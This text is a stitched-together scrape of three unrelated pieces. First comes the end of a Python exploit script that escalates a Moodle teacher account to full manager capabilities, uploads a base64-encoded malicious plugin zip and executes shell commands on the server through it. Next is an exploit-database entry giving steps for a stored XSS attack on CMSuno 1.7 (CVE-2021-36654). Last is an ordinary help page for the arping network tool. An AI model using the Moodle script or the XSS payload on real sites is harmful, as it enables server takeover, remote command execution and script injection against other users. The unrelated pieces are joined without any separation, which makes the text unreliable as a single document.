,'1'),('mod/data:viewrating','1'),('mod/data:writeentry','1'),('mod/feedback:complete','1'),('mod/feedback:createprivatetemplate','1'),('mod/feedback:createpublictemplate','1'),('mod/feedback:deletesubmissions','1'),('mod/feedback:deletetemplate','1'),('mod/feedback:edititems','1'),('mod/feedback:mapcourse','1'),('mod/feedback:receivemail','1'),('mod/feedback:view','1'),('mod/feedback:viewanalysepage','1'),('mod/feedback:viewreports','1'),('mod/folder:managefiles','1'),('mod/folder:view','1'),('mod/forum:addnews','1'),('mod/forum:addquestion','1'),('mod/forum:allowforcesubscribe','1'),('mod/forum:canoverridecutoff','1'),('mod/forum:canoverridediscussionlock','1'),('mod/forum:canposttomygroups','1'),('mod/forum:cantogglefavourite','1'),('mod/forum:createattachment','1'),('mod/forum:deleteanypost','1'),('mod/forum:deleteownpost','1'),('mod/forum:editanypost','1'),('mod/forum:exportdiscussion','1'),('mod/forum:exportforum','1'),('mod/forum:exportownpost','1'),('mod/forum:exportpost','1'),('mod/forum:grade','1'),('mod/forum:managesubscriptions','1'),('mod/forum:movediscussions','1'),('mod/forum:pindiscussions','1'),('mod/forum:postprivatereply','1'),('mod/forum:postwithoutthrottling','1'),('mod/forum:rate','1'),('mod/forum:readprivatereplies','1'),('mod/forum:replynews','1'),('mod/forum:replypost','1'),('mod/forum:splitdiscussions','1'),('mod/forum:startdiscussion','1'),('mod/forum:viewallratings','1'),('mod/forum:viewanyrating','1'),('mod/forum:viewdiscussion','1'),('mod/forum:viewhiddentimedposts','1'),('mod/forum:viewqandawithoutposting','1'),('mod/forum:viewrating','1'),('mod/forum:viewsubscribers','1'),('mod/glossary:approve','1'),('mod/glossary:comment','1'),('mod/glossary:export','1'),('mod/glossary:exportentry','1'),('mod/glossary:exportownentry','1'),('mod/glossary:import','1'),('mod/glossary:managecategories','1'),('mod/glossary:managecomments','1'),('mod/glossary:manageentries','1'),('mod/glossary:rate','1'),('mod/glossary:view','1'),('mod/glossary:viewallratings','1'),('mod/glossary:viewanyrating','1'),('mod/glossary:viewrating','1'),('mod/glossary:write','1'),('mod/h5pactivity:reviewattempts','1'),('mod/h5pactivity:submit','1'),('mod/h5pactivity:view','1'),('mod/imscp:view','1'),('mod/label:view','1'),('mod/lesson:edit','1'),('mod/lesson:grade','1'),('mod/lesson:manage','1'),('mod/lesson:manageoverrides','1'),('mod/lesson:view','1'),('mod/lesson:viewreports','1'),('mod/lti:admin','1'),('mod/lti:manage','1'),('mod/lti:view','1'),('mod/page:view','1'),('mod/quiz:attempt','1'),('mod/quiz:deleteattempts','1'),('mod/quiz:emailconfirmsubmission','1'),('mod/quiz:emailnotifysubmission','1'),('mod/quiz:emailwarnoverdue','1'),('mod/quiz:grade','1'),('mod/quiz:ignoretimelimits','1'),('mod/quiz:manage','1'),('mod/quiz:manageoverrides','1'),('mod/quiz:preview','1'),('mod/quiz:regrade','1'),('mod/quiz:reviewmyattempts','1'),('mod/quiz:view','1'),('mod/quiz:viewreports','1'),('mod/resource:view','1'),('mod/scorm:deleteownresponses','1'),('mod/scorm:deleteresponses','1'),('mod/scorm:savetrack','1'),('mod/scorm:skipview','1'),('mod/scorm:viewreport','1'),('mod/scorm:viewscores','1'),('mod/survey:download','1'),('mod/survey:participate','1'),('mod/survey:readresponses','1'),('mod/url:view','1'),('mod/wiki:createpage','1'),('mod/wiki:editcomment','1'),('mod/wiki:editpage','1'),('mod/wiki:managecomment','1'),('mod/wiki:managefiles','1'),('mod/wiki:managewiki','1'),('mod/wiki:overridelock','1'),('mod/wiki:viewcomment','1'),('mod/wiki:viewpage','1'),('mod/workshop:allocate','1'),('mod/workshop:deletesubmissions','1'),('mod/workshop:editdimensions','1'),('mod/workshop:exportsubmissions','1'),('mod/workshop:ignoredeadlines','1'),('mod/workshop:manageexamples','1'),('mod/workshop:overridegrades','1'),('mod/workshop:peerassess','1'),('mod/workshop:publishsubmissions','1'),('mod/workshop:submit','1'),('mod/workshop:switchphase','1'),('mod/workshop:view','1'),('mod/workshop:viewallassessments','1'),('mod/workshop:viewallsubmissions','1'),('mod/workshop:viewauthornames','1'),('mod/workshop:viewauthorpublished','1'),('mod/workshop:viewpublishedsubmissions','1'),('mod/workshop:viewreviewernames','1'),('moodle/backup:backupactivity','1'),('moodle/competency:coursecompetencyconfigure','1'),('moodle/course:activityvisibility','1'),('moodle/course:ignoreavailabilityrestrictions','1'),('moodle/course:manageactivities','1'),('moodle/course:togglecompletion','1'),('moodle/course:viewhiddenactivities','1'),('moodle/h5p:deploy','1'),('moodle/h5p:setdisplayoptions','1'),('moodle/h5p:updatelibraries','1'),('moodle/site:accessallgroups','1'),('moodle/site:managecontextlocks','1'),('moodle/site:trustcontent','1'),('moodle/site:viewanonymousevents','1'),('moodle/site:viewfullnames','1'),('moodle/site:viewuseridentity','1'),('quiz/grading:viewidnumber','1'),('quiz/grading:viewstudentnames','1'),('quiz/statistics:view','1'),('quizaccess/seb:bypassseb','1'),('quizaccess/seb:manage_filemanager_sebconfigfile','1'),('quizaccess/seb:manage_seb_activateurlfiltering','1'),('quizaccess/seb:manage_seb_allowedbrowserexamkeys','1'),('quizaccess/seb:manage_seb_allowreloadinexam','1'),('quizaccess/seb:manage_seb_allowspellchecking','1'),('quizaccess/seb:manage_seb_allowuserquitseb','1'),('quizaccess/seb:manage_seb_enableaudiocontrol','1'),('quizaccess/seb:manage_seb_expressionsallowed','1'),('quizaccess/seb:manage_seb_expressionsblocked','1'),('quizaccess/seb:manage_seb_filterembeddedcontent','1'),('quizaccess/seb:manage_seb_linkquitseb','1'),('quizaccess/seb:manage_seb_muteonstartup','1'),('quizaccess/seb:manage_seb_quitpassword','1'),('quizaccess/seb:manage_seb_regexallowed','1'),('quizaccess/seb:manage_seb_regexblocked','1'),('quizaccess/seb:manage_seb_requiresafeexambrowser','1'),('quizaccess/seb:manage_seb_showkeyboardlayout','1'),('quizaccess/seb:manage_seb_showreloadbutton','1'),('quizaccess/seb:manage_seb_showsebdownloadlink','1'),('quizaccess/seb:manage_seb_showsebtaskbar','1'),('quizaccess/seb:manage_seb_showtime','1'),('quizaccess/seb:manage_seb_showwificontrol','1'),('quizaccess/seb:manage_seb_templateid','1'),('quizaccess/seb:manage_seb_userconfirmquit','1'),('repository/areafiles:view','1'),('repository/boxnet:view','1'),('repository/contentbank:view','1'),('repository/coursefiles:view','1'),('repository/dropbox:view','1'),('repository/equella:view','1'),('repository/filesystem:view','1'),('repository/flickr:view','1'),('repository/flickr_public:view','1'),('repository/googledocs:view','1'),('repository/local:view','1'),('repository/merlot:view','0'),('repository/nextcloud:view','1'),('repository/onedrive:view','1'),('repository/picasa:view','1'),('repository/recent:view','1'),('repository/s3:view','1'),('repository/skydrive:view','1'),('repository/upload:view','1'),('repository/url:view','1'),('repository/user:view','1'),('repository/webdav:view','1'),('repository/wikimedia:view','1'),('repository/youtube:view','1'),('block/activity_modules:addinstance','1'),('block/activity_results:addinstance','1'),('block/admin_bookmarks:addinstance','1'),('block/badges:addinstance','1'),('block/blog_menu:addinstance','1'),('block/blog_recent:addinstance','1'),('block/blog_tags:addinstance','1'),('block/calendar_month:addinstance','1'),('block/calendar_upcoming:addinstance','1'),('block/comments:addinstance','1'),('block/completionstatus:addinstance','1'),('block/course_list:addinstance','1'),('block/course_summary:addinstance','1'),('block/feedback:addinstance','1'),('block/globalsearch:addinstance','1'),('block/glossary_random:addinstance','1'),('block/html:addinstance','1'),('block/login:addinstance','1'),('block/mentees:addinstance','1'),('block/mnet_hosts:addinstance','1'),('block/myprofile:addinstance','1'),('block/navigation:addinstance','1'),('block/news_items:addinstance','1'),('block/online_users:addinstance','1'),('block/online_users:viewlist','1'),('block/private_files:addinstance','1'),('block/quiz_results:addinstance','1'),('block/recent_activity:addinstance','1'),('block/rss_client:addinstance','1'),('block/rss_client:manageanyfeeds','1'),('block/rss_client:manageownfeeds','1'),('block/search_forums:addinstance','1'),('block/section_links:addinstance','1'),('block/selfcompletion:addinstance','1'),('block/settings:addinstance','1'),('block/site_main_menu:addinstance','1'),('block/social_activities:addinstance','1'),('block/tag_flickr:addinstance','1'),('block/tag_youtube:addinstance','1'),('block/tags:addinstance','1'),('moodle/block:edit','1'),('moodle/block:view','1'),('moodle/site:manageblocks','1'),('savechanges','Save changes')] r = session.post(url + '/admin/roles/define.php', params=data_get, data=data_post) # Above we modify description field, so, if script find that description on site, we are good. if random_desc not in r.text: p6.failure(Color.RED + "✘" + Color.END) print(Color.RED + "\nTrouble updating fields\n") exit(1) else: r = session.get(url + '/admin/search.php') if "Install plugins" not in r.text: p6.failure(Color.RED + "✘" + Color.END) print(Color.RED + "\nModified fields but the options to install plugins have not been enabled.") print(Color.RED + "- (This is weird, sometimes he does it, sometimes he doesn't!!) Try again.\n") exit(1) sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0] p6.success(Color.YELLOW + "✓" + Color.END) time.sleep(1) return session, sess_key def zipb64_up(session, url, sess_key, teacher_user, course_id): ''' Doing upload of zip file as base64 binary data * https://stackabuse.com/encoding-and-decoding-base64-strings-in-python/ ''' p7 = log.progress("Uploading malicious " + Color.BLUE + ".zip" + Color.END + " file") r = session.get(url + '/admin/tool/installaddon/index.php') zipfile_id = re.findall(r'name="zipfile" id="id_zipfile" value="(.*?)"', r.text)[0] client_id = re.findall(r'"client_id":"(.*?)"', r.text)[0] # Upupup data_get = {"action":"upload"} data_post = { "title" : "", "author" : teacher_user, "license" : "unknown", "itemid" : [zipfile_id, zipfile_id], "accepted_types[]" : [".zip",".zip"], "repo_id" : course_id, "p" : "", "page" : "", "env" : "filepicker", "sesskey" : sess_key, "client_id" : client_id, "maxbytes" : "-1", "areamaxbytes" : "-1", "ctx_id" : "1", "savepath" : "/" } zip_b64 = 'UEsDBAoAAAAAAOVa0VAAAAAAAAAAAAAAAAAEAAAAcmNlL1BLAwQKAAAAAACATtFQAAAAAAAAAAAAAAAACQAAAHJjZS9sYW5nL1BLAwQKAAAAAAB2bdFQAAAAAAAAAAAAAAAADAAAAHJjZS9sYW5nL2VuL1BLAwQUAAAACAD4W9FQA9MUliAAAAAeAAAAGQAAAHJjZS9sYW5nL2VuL2Jsb2NrX3JjZS5waHCzsS/IKFAoriwuSc3VUIl3dw2JVk/OTVGP1bRWsLcDAFBLAwQUAAAACAB6bdFQtXxvb0EAAABJAAAADwAAAHJjZS92ZXJzaW9uLnBocLOxL8goUODlUinIKU3PzNO1K0stKs7Mz1OwVTAyMDIwMDM0NzCwRpJPzs8tyM9LzSsBqlBPyslPzo4vSk5VtwYAUEsBAh8ACgAAAAAA5VrRUAAAAAAAAAAAAAAAAAQAJAAAAAAAAAAQAAAAAAAAAHJjZS8KACAAAAAAAAEAGAB/2bACX0TWAWRC9B9fRNYBhvTzH19E1gFQSwECHwAKAAAAAACATtFQAAAAAAAAAAAAAAAACQAkAAAAAAAAABAAAAAiAAAAcmNlL2xhbmcvCgAgAAAAAAABABgArE3mRVJE1gGOG/QfX0TWAYb08x9fRNYBUEsBAh8ACgAAAAAAdm3RUAAAAAAAAAAAAAAAAAwAJAAAAAAAAAAQAAAASQAAAHJjZS9sYW5nL2VuLwoAIAAAAAAAAQAYAMIcIaZyRNYBwhwhpnJE1gGOG/QfX0TWAVBLAQIfABQAAAAIAPhb0VAD0xSWIAAAAB4AAAAZACQAAAAAAAAAIAAAAHMAAAByY2UvbGFuZy9lbi9ibG9ja19yY2UucGhwCgAgAAAAAAABABgA1t0sN2BE1gHW3Sw3YETWAfYt6i9fRNYBUEsBAh8AFAAAAAgAem3RULV8b29BAAAASQAAAA8AJAAAAAAAAAAgAAAAygAAAHJjZS92ZXJzaW9uLnBocAoAIAAAAAAAAQAYAO6e2qlyRNYB7p7aqXJE1gFkQvQfX0TWAVBLBQYAAAAABQAFANsBAAA4AQAAAAA=' zip_file_bytes = zip_b64.encode('utf-8') zip_file_b64 = base64.decodebytes(zip_file_bytes) data_file = [ ('repo_upload_file', ('rce.zip', zip_file_b64, 'application/zip'))] r = session.post(url + '/repository/repository_ajax.php', params=data_get, data=data_post, files=data_file) if "rce.zip" not in r.text: p7.failure(Color.RED + "✘" + Color.END) print(Color.RED + "\nError uploading zip file.\n") exit(1) # Trying to load file data_post = { "sesskey" : sess_key, "_qf__tool_installaddon_installfromzip_form" : "1", "mform_showmore_id_general" : "0", "mform_isexpanded_id_general" : "1", "zipfile" : zipfile_id, "plugintype" : "", "rootdir" : "", "submitbutton" : "Install plugin from the ZIP file" } r = session.post(url + '/admin/tool/installaddon/index.php', data=data_post) if "Validation successful, installation can continue" not in r.text: p7.failure(Color.RED + "✘" + Color.END) print(Color.RED + "\nError uploading zip file, problems on plugin install.\n") exit(1) # Confirm load zip_storage = re.findall(r'installzipstorage=(.*?)&', r.url)[0] data_post = { "installzipcomponent" : "block_rce", "installzipstorage" : zip_storage, "installzipconfirm" : "1", "sesskey" : sess_key } r = session.post(url + '/admin/tool/installaddon/index.php', data=data_post) if "Current release information" not in r.text: p7.failure(Color.RED + "✘" + Color.END) print(Color.RED + "\nError uploading zip file, confirmation problems.\n") exit(1) p7.success(Color.YELLOW + "✓" + Color.END) time.sleep(1) return session def moodle_RCE(url, command): ''' Remote Command Execution on system with plugin installed (malicious zip file) ''' p8 = log.progress("Executing " + Color.BLUE + command + Color.END) time.sleep(1) data_get = {"cmd" : command} try: r = session.get(url + '/blocks/rce/lang/en/block_rce.php', params=data_get, timeout=3) p8.success(Color.YELLOW + "✓" + Color.END) time.sleep(1) print("\n" + Color.YELLOW + r.text + Color.END) except requests.exceptions.Timeout as e: p8.success(Color.YELLOW + "✓" + Color.END) time.sleep(1) pass print("[" + Color.YELLOW + "+" + Color.END + "]" + Color.GREEN + " Keep breaking ev3rYthiNg!!\n" + Color.END) if __name__ == '__main__': args = arguments() session, id_user, sess_key = login(args.url, args.username, args.password, args.id_course, args.teacher_cookie) enrol2rce(session, args.url, args.id_manager, args.username, args.id_course, args.teacher_cookie, args.command)

# Exploit Title: CMSuno 1.7 - 'tgo' Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 03-08-2021 # Exploit Author: splint3rsec # Vendor Homepage: https://github.com/boiteasite # Software Link: https://github.com/boiteasite/cmsuno # Affected Version(s): CMSuno 1.7 (and prior) # CVE : CVE-2021-36654 CMSuno version 1.7 and prior is vulnerable to a stored cross-site scripting. The attacker must be authenticated to exploit the vulnerability. The payload injection is done while updating the template's image filename, vulnerable parameter is *tgo* Steps to reproduce: 1. Go to /uno.php and click on *plugins* 2. Click on *Logo* 3. Choose a random picture in your files repo, click on save and intercept the request 4. Edit the POST request to /uno/template/uno1/uno1.php by modifying the tgo parameter's value to ")}</style><script>VULN JS CODE HERE</script> 5. Forward the request and click on *publish* 6. Click on *See the website* 7. XSS

Arping is used to discover surviving hosts on computer networks. By scanning the IP within the network segment, you can obtain relevant information about the address and survival status. Arping uses the Address Resolution Protocol (ARP) to run work at layer 2 (or the link layer of the OSI model) to detect hosts. Since ARP is not routable, this only applies to local networks. User Help arping -h ARPing 2.22, by Thomas Habets thomas@habets.se usage: arping [ -0aAbdDeFpPqrRuUv ] [ -w sec ] [ -W sec ] [ -S host/ip ] [ -T host/ip ] [ -s MAC ] [ -t MAC ] [ -c count ] [ -C count ] [ -i interface ] [ -m type ] [ -g group ] [ -V vlan ] [ -Q priority ] host/ip/MAC | -B For complete usage info, use --help or check the manpage. Parameter definition -A: Similar to the -U parameter, but uses the ARP REPLY package instead of the ARP REQUEST package. -b: Send Ethernet broadcast frames, arping uses the broadcast address at the beginning, and unicast unicast address after receiving the reply. -c: Stop after sending the specified count ARP REQUEST packets. If the -w parameter is specified, the same number of ARP REPLY packets will be waited until the timeout is reached. -D: Duplicate address detection mode, that is, Duplicate address detection mode (DAD), is used to detect whether there is an IP address conflict, and if there is no IP conflict, it will return 0. -f: Exit after receiving the first response packet. -h: Show the help page. -I: The name of the network device used to send the ARP REQUEST packet. -q: quite mode, no output is displayed. -U: Unreasonable (forced) ARP mode to update the local information in the ARP CACHE list on other hosts, no response is required. -V: Display the version number of arping. -w: Specify a timeout time in seconds, arping exits after reaching the specified time, regardless of how many packets were sent or received during the period. In this case, arping will not stop after sending the specified count (-c) packets, but will wait until the timeout or the sent count packets will respond before exiting. -s: Set the IP resource address for sending ARP packets. If it is empty, it will be processed as follows: 1. DAD mode (-D) is set to 0.0.0.0; 2. Unsolicited mode (-U) is set to the target address; 3. Other methods are calculated from the routing table. Example Obtain the destination MAC address through the IP address arping -c 5 192.168.123.129 Test the survival status of the target host arping -c 4 -I eth0 192.168.123.192 -S 4 Send 4 detection messages. If there is a reply, it means that the other party is alive.